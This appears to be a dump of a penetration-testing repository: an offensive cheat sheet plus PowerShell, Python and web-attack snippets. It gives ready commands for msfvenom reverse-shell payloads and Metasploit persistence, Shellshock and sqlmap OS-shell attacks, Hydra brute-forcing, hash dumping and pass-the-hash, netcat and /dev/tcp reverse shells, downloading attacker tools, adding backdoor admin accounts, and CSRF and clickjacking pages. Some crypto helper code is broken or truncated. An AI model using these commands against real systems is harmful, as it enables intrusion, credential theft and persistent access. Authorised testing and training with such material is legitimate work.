[SNMP](#snmp) 12 | * [NSE scripts](#nse-scripts) 13 | * [Exploitation](#exploitation) 14 | * [Compiling exploits](#compiling-exploits) 15 | * [Binaries/shellcode](#binariesshellcode) 16 | * [SQL Injection](#sql-injection) 17 | * [Shellshock](#shellshock) 18 | * [Password attacks](#password-attacks) 19 | * [Bruteforce or dictionary](#bruteforce-or-dictionary) 20 | * [Password / hash dump](#password--hash-dump) 21 | * [Pass the hash](#pass-the-hash) 22 | * [Post Exploitation](#post-exploitation) 23 | * [Reverse shells](#reverse-shells) 24 | * [File transfer](#file-transfer) 25 | * [Add User](#add-user) 26 | * [Privilege Escalation](#privilege-escalation) 27 | * [Windows](#windows) 28 | * [Linux](#linux) 29 | * [Tunneling](#tunneling) 30 | * [Remote Port Forward (HOST A - KALI, HOST B - COMPROMISED, HOST C - TARGET )](#remote-port-forward-host-a---kali-host-b---compromised-host-c---target-) 31 | * [Proxychains](#proxychains) 32 | * [Local SSH Port Forward](#local-ssh-port-forward) 33 | 34 | 35 | 36 | 37 | 38 | ## Enumeration 39 | 40 | 41 | ### Arp Scan 42 | ```bash 43 | netdiscover -i eth1 -r 44 | arp -a -i eth1 45 | ``` 46 | 47 | 48 | ### Ping Sweep 49 | 50 | Bash 51 | ```bash 52 | for ip in $(seq 1 254); do ping -c 1 192.168.0.$ip | grep "bytes from" | cut -d" " -f4 |cut -d":" -f1 ; done 53 | ``` 54 | TODO Windows/PS, Python 55 | 56 | 57 | ### Port Scan 58 | 59 | TCP 60 | ```bash 61 | nmap -v -sS -sV -Pn -n -p- 62 | ``` 63 | 64 | UDP 65 | ```bash 66 | nmap -v -sU -Pn -n --top-ports=25 67 | ``` 68 | 69 | Netcat traditional 70 | ```bash 71 | nc -v -n -z -w1 1-10000 72 | ``` 73 | 74 | Netcat OpenBSD 75 | ```bash 76 | nc -v -n -z -w1 > 1-10000 2>&1 |grep succeed 77 | ``` 78 | 79 | 80 | ### Web 81 | Looking for common vulns 82 | ```bash 83 | nmap -sV -Pn -v -p --script http-vuln* 84 | ``` 85 | 86 | Dirbusting 87 | ```bash 88 | dirb http:/// /usr/share/dirb/wordlists/big.txt -S -r -w 89 | ``` 90 | 91 | 92 | ### SMB 93 | ```bash 94 | enum4linux -v -a 95 | ``` 96 | 97 | ```bash 98 | nmap -sV -Pn -vv -p --script=smb-check-vulns,smb-psexec,smb-vuln-ms10-054,smb-vuln-ms10-061 --script-args=unsafe=1 99 | ``` 100 | 101 | 102 | ### SNMP 103 | ```bash 104 | snmpcheck -t 105 | ``` 106 | 107 | ### NSE scripts 108 | ```bash 109 | ls /usr/share/nmap/scripts/ -l | grep 110 | ``` 111 | * smb* 112 | * http* 113 | 114 | ### tcpdump 115 | ```bash 116 | sudo tcpdump -i eth0 -nq -s0 -C100 -w audit_`date +"%Y%m%d_%H%M%S"`.pcap 117 | ``` 118 | 119 | ## Exploitation 120 | 121 | ### Compiling exploits 122 | 123 | Compiling on Windows 124 | ```bash 125 | gcc -m32 -ggdb -o -fno-stack-protector -mpreferred-stack-boundary=2 -z execstack .c 126 | ``` 127 | Compiling on Linux 128 | ```bash 129 | gcc .c -o -lssl -lcrypt 130 | ``` 131 | Compiling Windows flavored C on Linux (note missing libraries) 132 | ```bash 133 | i586-mingw32msvc-gcc .c -o .exe -lwsock32 -lrpcrt4 -lmpr -lws2_32 134 | ``` 135 | 136 | 137 | ### Binaries/shellcode 138 | 139 | Msfvenom 140 | ```bash 141 | msfvenom -p windows/shell_reverse_tcp LHOST= LPORT= -f exe -e x86/shikata_ga_nai -a x86 --platform win -b "\x00" > winreverseshell.exe 142 | msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f exe -e x86/shikata_ga_nai -a x86 --platform win -b "\x00" > winrmeterpretershell.exe 143 | ``` 144 | 145 | Metasploit Listener 146 | ``` 147 | use exploit/multi/handler 148 | set PAYLOAD 149 | set LHOST 150 | set LPORT 151 | set ExitOnSession false 152 | exploit -j -z 153 | ``` 154 | 155 | Meterpreter reminders 156 | ``` 157 | msfdb init 158 | show options advanced 159 | set ExitOnSession false 160 | set AutoRunScript persistence 161 | ``` 162 | 163 | ### SQL Injection 164 | ```bash 165 | sqlmap -u "http:///index.php" --data="username=admin&password=admin&Submit=Login+In" --level=5 --risk=3 --time-sec 10 --dbms=mysql --os-shell 166 | ``` 167 | 168 | ### Shellshock 169 | ```bash 170 | curl -A '() { :;}; echo -en "\r\n\r\n$(echo;/usr/bin/id)\r\n\r\n"' :/cgi-bin/vuln.cgi 171 | curl -i -X OPTIONS -H "User-Agent: () { :;};echo;/usr/bin/id" "http://:/cgi-bin/vuln.cgi" 172 | ssh noob@ '() { :;}; uname -a' 173 | ``` 174 | 175 | 176 | 177 | 178 | 179 | 180 | ## Password attacks 181 | 182 | ### Bruteforce or dictionary 183 | LM 184 | ```bash 185 | rcracki_mt -h 186 | ``` 187 | 188 | Hydra 189 | ```bash 190 | hydra -V -u -o found-ftp.txt -e nsr -L wordlists/users.txt -P wordlists/passwords.txt -s 21 ftp 191 | 192 | hydra -V -u -o found-ssh.txt -e nsr -L wordlists/users.txt -P wordlists/passwords.txt -s 22 ssh 193 | 194 | hydra -V -u -o found-telnet.txt -e nsr -L wordlists/users.txt -P wordlists/passwords.txt -s 23 telnet 195 | 196 | hydra -V -u -o found-snmp.txt -e nsr -P wordlists/snmp.txt snmp 197 | ``` 198 | 199 | John 200 | ```bash 201 | john --rules --wordlist=/usr/share/wordlists/rockyou.txt --format= 202 | ``` 203 | 204 | Unshadow 205 | ```bash 206 | unshadow /etc/passwd /etc/shadow > unshadowed 207 | ``` 208 | 209 | Hash id (https://github.com/psypanda/hashID) 210 | ```bash 211 | hashid.py -j 212 | ``` 213 | 214 | ### Password / hash dump 215 | ``` 216 | wce -w 217 | PwDump7.exe 218 | ``` 219 | 220 | ### Pass the hash 221 | ``` 222 | pth-winexe -U bob%254095eef2e2be31f7a83d6fb4b9887b:0d3f32016ee8a42ba768d558875d57e5 // cmd 223 | ``` 224 | 225 | 226 | 227 | 228 | 229 | 230 | ## Post Exploitation 231 | 232 | ### Reverse shells 233 | Netcat 234 | ``` 235 | nc -nv -e /bin/bash 236 | nc -nv -e cmd.exe 237 | ``` 238 | 239 | Bash 240 | ``` 241 | /bin/bash -i >& /dev/tcp// 0>&1 242 | ``` 243 | 244 | Improve Linux feedback on shell 245 | ``` 246 | python -c 'import pty; pty.spawn("/bin/bash")' 247 | echo os.system('/bin/bash') 248 | /bin/sh -i 249 | ``` 250 | 251 | ### File transfer 252 | 253 | FTP 254 | ``` 255 | echo open > ftp.txt 256 | echo >> ftp.txt 257 | echo >> ftp.txt 258 | echo bin >> ftp.txt 259 | echo get nc.exe >> ftp.txt 260 | echo bye >> ftp.txt 261 | ftp -s:ftp.txt 262 | ``` 263 | 264 | Powershell 265 | ``` 266 | echo $storageDir = $pwd > wget.ps1 267 | echo $webclient = New-Object System.Net.WebClient >> wget.ps1 268 | echo $url = "http:///accesschk.exe" >> wget.ps1 269 | echo $file = "accesschk.exe" >> wget.ps1 270 | echo $webclient.DownloadFile($url,$file) >> wget.ps1 271 | 272 | powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1 273 | ``` 274 | 275 | 276 | ### Add User 277 | Windows 278 | ``` 279 | net user hacker MNB00zxc /add 280 | net localgroup administrators hacker /add 281 | ``` 282 | Linux 283 | ``` 284 | /usr/sbin/useradd -g 0 -m -o -u 0 hacker 285 | echo "hacker:123456qwe" | /usr/sbin/chpasswd 286 | ``` 287 | 288 | 289 | ## Privilege Escalation 290 | 291 | ### Windows 292 | Find misconfigured services 293 | ```bash 294 | accesschk.exe /accepteula -uwcqv "Authenticated Users" * 295 | ``` 296 | 297 | Find all weak folder permissions per drive. 298 | ```bash 299 | accesschk.exe /accepteula -uwdqs Users c:\ 300 | accesschk.exe /accepteula -uwdqs "Authenticated Users" c:\ 301 | ``` 302 | 303 | Find all weak file permissions per drive. 304 | ```bash 305 | accesschk.exe /accepteula -uwqs Users c:\*.* 306 | accesschk.exe /accepteula -uwqs "Authenticated Users" c:\*.* 307 | ``` 308 | 309 | ### Linux 310 | Find starting at root (/), SGID or SUID, not Symbolic links, only 3 folders deep, list with more detail and hide any errors (e.g. permission denied) 311 | ```bash 312 | find / -perm -g=s -o -perm -4000 ! -type l -maxdepth 3 -exec ls -ld {} \; 2>/dev/null 313 | ``` 314 | 315 | Find passwords in files 316 | ```bash 317 | grep -i -r "password" /**/*.php 2>/dev/null 318 | find . -name "*.php" -print0 | xargs -0 grep -i -n "password" 2>/dev/null 319 | ``` 320 | Sticky bit - Only the owner of the directory or the owner of a file can delete or rename here 321 | ``` 322 | find / -perm -1000 -type d 2>/dev/null 323 | ``` 324 | 325 | SGID (chmod 2000) - run as the group, not the user who started it 326 | ``` 327 | find / -perm -g=s -type f 2>/dev/null 328 | ``` 329 | 330 | SUID (chmod 4000) - run as the owner, not the user who started it 331 | ``` 332 | find / -perm -u=s -type f 2>/dev/null 333 | ``` 334 | 335 | SGID or SUID 336 | ``` 337 | find / -perm -g=s -o -perm -u=s -type f 2>/dev/null 338 | ``` 339 | 340 | Sudo list permissions 341 | ```bash 342 | sudo -l 343 | ``` 344 | 345 | 346 | 347 | 348 | 349 | ## Tunneling 350 | 351 | ### Remote Port Forward (HOST A - KALI, HOST B - COMPROMISED, HOST C - TARGET ) 352 | ``` 353 | COMPROMISED > plink.exe KALI -P 22 -l root -pw rootpass -C -R 3389:TARGET:3389 354 | ``` 355 | 356 | ### Proxychains 357 | ``` 358 | ssh -D -p hacker@COMPROMISED 359 | 360 | proxychains 361 | ``` 362 | 363 | ### Local SSH Port Forward 364 | ``` 365 | ssh -L :: hacker@COMPROMISED 366 | ``` -------------------------------------------------------------------------------- /snippets/android/help.md: -------------------------------------------------------------------------------- 1 | ```bash 2 | adb shell pm list packages 3 | adb shell pm clear my.wonderful.app.package 4 | ``` 5 | * http://forum.xda-developers.com/showthread.php?t=2528952 6 | * https://support.portswigger.net/customer/portal/articles/1841102-installing-burp-s-ca-certificate-in-an-android-device 7 | * http://www.gottabemobile.com/2013/11/10/enable-developer-options-nexus-5-kitkat/ -------------------------------------------------------------------------------- /snippets/bash/README.md: -------------------------------------------------------------------------------- 1 | ## Bash snippets 2 | ### Improve limited shell 3 | ```bash 4 | python -c 'import pty; pty.spawn("/bin/bash")' 5 | echo os.system('/bin/bash') 6 | /bin/sh -i 7 | ``` -------------------------------------------------------------------------------- /snippets/powershell/README.md: -------------------------------------------------------------------------------- 1 | ## PowerShell snippets 2 | ### Execution Bypass 3 | ```powershell 4 | Set-ExecutionPolicy Bypass -Scope Process 5 | Set-Executionpolicy -Scope CurrentUser -ExecutionPolicy UnRestricted 6 | powershell -ExecutionPolicy ByPass -File script.ps1 7 | ``` 8 | 9 | ### Change proxy 10 | ```powershell 11 | #Change this to whatever proxy you want to use 12 | $newProxy = "http://localhost:8080" 13 | 14 | $path = "HKCU:\Software\Microsoft\Windows\CurrentVersion\Internet Settings\" 15 | 16 | Set-ItemProperty -Path $path -Name "MigrateProxy" -Value 00000001 17 | Set-ItemProperty -Path $path -Name "ProxyEnable" -Value 00000001 18 | Set-ItemProperty -Path $path -Name "ProxyHttp1.1" -Value 00000000 19 | Set-ItemProperty -Path $path -Name "ProxyServer" -Value $newProxy 20 | Set-ItemProperty -Path $path -Name "ProxyOverride" -Value "" 21 | 22 | #Hex array with several configurations, but just want to change the 9th value 23 | $a = (Get-ItemProperty -Path ($path+"Connections\") -Name DefaultConnectionSettings).DefaultConnectionSettings 24 | $a[8] = 3 25 | $a[8] = 29 #to revert 26 | 27 | Set-ItemProperty -Path ($path+"Connections\") -Name DefaultConnectionSettings -Value $a 28 | ``` 29 | 30 | ### Download file 31 | ```powershell 32 | $url = "http://192.168.0.200" 33 | $client = new-object System.Net.WebClient 34 | $client.DownloadFile(($url+"/fgdump.exe"), "fgdump.exe") 35 | ``` 36 | ### Search for files with "pass" 37 | ```powershell 38 | $ErrorActionPreference = "SilentlyContinue" 39 | 40 | Get-PSDrive -PSProvider 'FileSystem' | ForEach-Object { 41 | $directory = $_ 42 | Write-Output "Looking for files in $($directory.Root) ($($directory.Description))" 43 | 44 | # Searching files that contain the string "pass" 45 | Get-ChildItem $directory.Root -Recurse | Where-Object { !$_PSIsContainer } | ForEach-Object { Select-String -path $_.FullName -pattern "password" -SimpleMatch -List } | ForEach-Object { $_.path } 46 | 47 | # Searching for files or directories with "pass" in the filename 48 | Get-ChildItem $directory.Root -Recurse -Include "*pass*" | ForEach-Object {$_.FullName} # Used to find files with password in the filename 49 | } 50 | 51 | @("\\some.ip.add.ress\network_share$") | ForEach-Object { 52 | Write-Output "Looking for files in $($_) " 53 | 54 | # Searching files that contain the string "pass" 55 | Get-ChildItem $_ -Recurse | Where-Object { !$_PSIsContainer } | ForEach-Object { Select-String -path $_.FullName -pattern "password" -SimpleMatch -List } | ForEach-Object { $_.path } 56 | 57 | # Searching for files or directories with "pass" in the filename 58 | Get-ChildItem $_ -Recurse -Include "*pass*" | ForEach-Object {$_.FullName} # Used to find files with password in the filename 59 | } 60 | ``` 61 | 62 | ### Mess with services/processes 63 | ```powershell 64 | Get-Service -name "m*" | Set-Service -StartupType "disabled" 65 | 66 | Stop-Process -force -name name*,any*,etc 67 | 68 | ``` 69 | 70 | ### Port scan 71 | ```powershell 72 | $ErrorActionPreference = "SilentlyContinue" # careful with this 73 | $ports = 1..10000 74 | $ip = "10.1.1.1" 75 | 76 | foreach ($port in $ports) { 77 | if(Test-Connection -BufferSize 32 -Count 1 -Quiet -ComputerName $ip) { 78 | $socket = new-object System.Net.Sockets.TcpClient($ip, $port) 79 | If($socket.Connected) { 80 | "$ip listening to port $port" 81 | $socket.Close() 82 | } 83 | } 84 | } 85 | ``` 86 | 87 | ```powershell 88 | 89 | $socket = new-object System.Net.Sockets.TcpClient("10.1.1.1", 445) 90 | If($socket.Connected) { 91 | "$ip listening to port $port" 92 | $socket.Close() 93 | } 94 | ``` -------------------------------------------------------------------------------- /snippets/python/README.md: -------------------------------------------------------------------------------- 1 | ## Python snippets 2 | 3 | ### TCP client 4 | ```python 5 | import socket 6 | host = 'google.com' 7 | port = 80 8 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 9 | s.connect((host, port)) 10 | s.sendall(b"GET / HTTP/1.1\r\nHost:google.com\r\n\r\n") 11 | response = s.recv(4096) 12 | print(response) 13 | ``` 14 | 15 | ### TCP server 16 | ```python 17 | import socket 18 | import threading 19 | bind_ip = '0.0.0.0' 20 | bind_port = 4445 21 | 22 | 23 | def handler(client_socket): 24 | client_request = client_socket.recv(1024) 25 | print('Received {}'.format(client_request)) 26 | client_socket.sendall(b'ACK\n') 27 | client_socket.close() 28 | 29 | server = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 30 | server.bind((bind_ip, bind_port)) 31 | 32 | server.listen(5) # max backlog of connections 33 | 34 | while True: 35 | client_socket, (ip, port) = server.accept() 36 | print("Received connection from {}:{}".format(ip, port)) 37 | thread = threading.Thread(target=handler, args=(client_socket,)) 38 | thread.start() 39 | ``` 40 | 41 | ### BigIP decoding and encoding 42 | ```python 43 | import struct 44 | import sys 45 | 46 | def decode(ip_int): 47 | print("[*] Decoding {}".format(ip_int)) 48 | host, port, end = str(ip_int).split('.') 49 | a, b, c, d = list(i for i in struct.pack("I", big_int) 109 | 110 | def raw_to_int(raw): 111 | return int.from_bytes(ip_bytes, byteorder='big') 112 | 113 | def ascii_to_raw(ascii_string): 114 | # If ascii_string is aa list it will be joined until it is no longer, e.g. 115 | # a list of lists of strings will correctly be converted into a string USEFUL IN CHALLENGE 6 116 | while isinstance(ascii_string, list): 117 | ascii_string = ''.join([element for element in ascii_string]) 118 | if isinstance(ascii_string, bytes): 119 | return ascii_string 120 | return bytes(ascii_string, 'utf-8') 121 | 122 | def list_of_int_to_bytes(list_of_ints): 123 | return bytes(list_of_ints) # more of a reminder than an actual useful method 124 | 125 | def fixed_xor(msg, key): 126 | msg, key = list(msg), list(key) 127 | if len(msg) != len(key): 128 | raise ValueError("Msg and key lenghts do not match. msg {}, key {}".format(len(msg),len(key))) 129 | return bytes([msg[i] ^ key[i] for i in range(len(msg))]) 130 | 131 | def repeating_char_xor(msg, key_char): 132 | return fixed_xor(msg, [key_char for _ in range(len(msg))]) 133 | 134 | def repeating_key_xor(msg, key): 135 | key = (ceil(len(msg)/len(key))*key)[:len(msg)] 136 | return fixed_xor(msg, key) 137 | 138 | def score_plaintext(plaintext, strict=False): 139 | ETAOIN = 'etaoinshrdlcumwfgypbvkjxqzETAOINSHRDLCUMWFGYPBVKJXQZ 1234567890!"\'#$%&()*+,-./:;<=>?@[\\]^_`{|}~\t\n\r' 140 | counter = 0 141 | for letter in plaintext: 142 | if letter.upper() in ETAOIN: 143 | counter += len(ETAOIN) - ETAOIN.index(letter.upper()) 144 | else: 145 | counter -= len(ETAOIN) # to punish plain texts with non printable chars 146 | return counter/len(plaintext) 147 | 148 | def single_char_xor_bruteforce(ciphertext): 149 | l = {key:score_plaintext(raw_to_ascii(repeating_char_xor(ciphertext, key))) for key in range(255)} 150 | return sorted(l.items(), key=lambda x: x[1], reverse=True)[0][0] 151 | 152 | def hamming_dist(raw1, raw2): 153 | return sum([bin(l).count('1') for l in fixed_xor(raw1, raw2)]) 154 | 155 | def break_raw_into_chunks(raw, chunksize): 156 | return [raw[i:i+chunksize] for i in range(0,len(raw),chunksize)] 157 | 158 | def transpose_blocks(blocks): 159 | # Gets the nth element of every block and creates a new block with them, e/g/ 160 | # transpose_blocks([[1,2,3],[1,2,3],[1,2,3]]) == [[1,1,1],[2,2,2],[3,3,3]] 161 | return [block for block in itertools.zip_longest(*blocks, fillvalue=0)] 162 | 163 | def discover_block_size(oracle): 164 | initial_len = len(oracle('')) 165 | for i in range(100): 166 | new_len = len(oracle('A'*i)) 167 | if new_len - initial_len > 0: 168 | return new_len - initial_len 169 | 170 | # Below AES methods with PKCS#7 padding scheme 171 | 172 | def pad_with_pkcs7(msg, block_size=16): 173 | msg = ascii_to_raw(msg) 174 | padding = block_size - (len(msg) % block_size) 175 | msg = msg + bytes(chr(padding) * padding, 'ascii') 176 | return msg 177 | 178 | def unpad_with_pkcs7(padded_plaintext): 179 | padded_plaintext = ascii_to_raw(padded_plaintext) 180 | last_byte = padded_plaintext[-1] 181 | pad = padded_plaintext[-last_byte:] 182 | if len(pad) != last_byte or [c for c in pad if c != last_byte]: 183 | raise ValueError("Bad padding. Last_byte = {}".format(hex(last_byte))) 184 | 185 | return padded_plaintext[:-last_byte] 186 | 187 | def aes_ecb_encrypt(key, msg): 188 | block_size = len(key) 189 | msg = pad_with_pkcs7(msg) 190 | cipher = AES.new(key, AES.MODE_ECB) 191 | return cipher.encrypt(msg) 192 | 193 | def aes_ecb_decrypt(key, cpt): 194 | block_size = len(key) 195 | cipher = AES.new(key, AES.MODE_ECB) 196 | msg = cipher.decrypt(cpt) 197 | return unpad_with_pkcs7(msg) 198 | 199 | def aes_cbc_encrypt(key, msg, iv=''): 200 | block_size = len(key) 201 | msg = pad_with_pkcs7(msg) 202 | iv = iv or Random.new().read(block_size) 203 | cipher = AES.new(key, AES.MODE_CBC, iv) 204 | return iv + cipher.encrypt(msg) 205 | 206 | def aes_cbc_decrypt(key, cpt): 207 | block_size = len(key) 208 | iv, cpt = cpt[:block_size], cpt[block_size:] 209 | cipher = AES.new(key, AES.MODE_CBC, iv) 210 | msg = cipher.decrypt(cpt) 211 | return unpad_with_pkcs7(msg) 212 | 213 | def detect_aes_block_cipher_mode(oracle, block_size): 214 | blocks = break_raw_into_chunks(oracle('A'*block_size*3), block_size) 215 | return 'ECB' if sum([1 for b1, b2 in list(itertools.combinations(blocks,2)) if b1==b2]) > 0 else 'CBC' 216 | 217 | def aes_ecb_find_secret_appended_text(oracle, block_size): 218 | # finds max size of prepended text, give or take padding 219 | cpt = break_raw_into_chunks(oracle('A' * block_size * 20), block_size) 220 | for i, chunk in enumerate(cpt): 221 | if chunk == cpt[i+1]: # If True, prepended finishes between i-1 and i 222 | max_size_of_prepended_text = i*block_size 223 | break 224 | 225 | # brute forces the appended text one character at a time 226 | for i in range(0, block_size): 227 | padding = 'A'*i 228 | my_input = 'A' * (block_size * 11) 229 | secret_append = '' 230 | 231 | try: 232 | while my_input: 233 | my_input = my_input[:-1] 234 | d = {oracle(padding + my_input + secret_append + l)[max_size_of_prepended_text+160:max_size_of_prepended_text+176]:l for l in string.printable} 235 | secret_append += d[oracle(padding + my_input)[max_size_of_prepended_text+160:max_size_of_prepended_text+176]] 236 | except KeyError: 237 | if secret_append: 238 | return ascii_to_raw(secret_append) 239 | 240 | def aes_ctr_encrypt(key, msg, counter): 241 | cipher = AES.new(key, AES.MODE_CTR, counter=counter) 242 | return cipher.decrypt(msg) 243 | 244 | def aes_ctr_randomiv_encrypt(key, msg): 245 | counter = Counter.new(8*16, initial_value = int.from_bytes(Random.new().read(16), 'big')) 246 | iv = bytes.fromhex(hex(counter.next_value())[2:]) 247 | cipher = AES.new(key, AES.MODE_CTR, counter=counter) 248 | return iv + cipher.decrypt(msg) 249 | 250 | def aes_ctr_randomiv_decrypt(cpt): 251 | counter = Counter.new(8*16, initial_value = int.from_bytes(cpt[:16],'big')) 252 | cipher = AES.new(key, AES.MODE_CTR, counter=counter) 253 | return cipher.decrypt(cpt[16:]) 254 | ``` -------------------------------------------------------------------------------- /web/burpsuite_free_v1.6.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/juliocesarfort/pentesting-dump/d20259cc2f98a7a380033c59c1248845d58054e9/web/burpsuite_free_v1.6.jar -------------------------------------------------------------------------------- /web/clickjacking_bypass.html: -------------------------------------------------------------------------------- 1 | 2 | 3 |

Vulnerable application loaded within an iframe

4 | 5 | 6 |

Double framing?

7 | 9 | 10 | 11 |

onBeforeUnload

12 | 18 | 20 | 21 | 22 | 23 |

No-Content Flushing

24 | 34 | 44 | 45 | 46 | 47 | 48 | -------------------------------------------------------------------------------- /web/clickjacking_outter_frame.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | -------------------------------------------------------------------------------- /web/csrf.html: -------------------------------------------------------------------------------- 1 | 2 | 3 |

Multi-step CSRF attack.

4 |

Post request is made for each one of the forms, with target being NstFrame.

5 | 6 | 7 | 8 | 9 |
11 | 12 |
13 | 14 |
16 | 17 |
18 | 19 | 25 | 26 | 27 | -------------------------------------------------------------------------------- /web/help.md: -------------------------------------------------------------------------------- 1 | ## User-Agents 2 | 3 | * IE6 4 | * Mozilla/5.0 (Windows; U; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727) 5 | * IE7 6 | * Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US) 7 | *IE11 8 | * Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko --------------------------------------------------------------------------------